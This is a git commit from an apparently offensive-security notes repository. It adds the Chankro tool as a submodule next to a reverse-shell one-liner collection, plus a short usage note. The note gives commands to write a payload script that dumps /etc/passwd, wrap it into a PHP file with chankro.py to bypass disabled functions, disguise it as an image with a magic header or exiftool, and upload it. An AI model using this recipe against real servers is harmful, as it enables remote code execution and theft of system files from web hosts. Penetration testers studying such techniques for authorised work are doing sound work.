whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

added php Preload lib exploit

This commit is contained in:
Stefan Friese 2021-09-11 16:00:40 +02:00
parent 55970b5c82
commit a41a43b6e7
3 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitmodules vendored
View File

@ -28,3 +28,6 @@
[submodule "reverse_shells/One-Lin3r"] [submodule "reverse_shells/One-Lin3r"]
path = reverse_shells/One-Lin3r path = reverse_shells/One-Lin3r
url = https://github.com/D4Vinci/One-Lin3r.git url = https://github.com/D4Vinci/One-Lin3r.git
[submodule "exploit/web/php/Chankro"]
path = exploit/web/php/Chankro
url = https://github.com/TarlogicSecurity/Chankro.git

1
exploit/web/php/Chankro Submodule

@ -0,0 +1 @@
Subproject commit 7b6e844e18f6812beb18db4b67b246edcec04b84

15
exploit/web/php/preload_lib.md Normal file
View File

@ -0,0 +1,15 @@
# Preload Library
* [Bug report](https://bugs.php.net/bug.php?id=46741)
* [Chankro repo](https://github.com/TarlogicSecurity/Chankro.git)
## Usage
* Create lib, find path via `<URL>/phpinfo.php`
```sh
echo "#!/usr/bin/env bash" > rev.sh
echo "cat /etc/passwd > <basepath>/output.txt" >> rev.sh
python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path <basepath>
```
* Put into image file via exiftool or write magic header
* Upload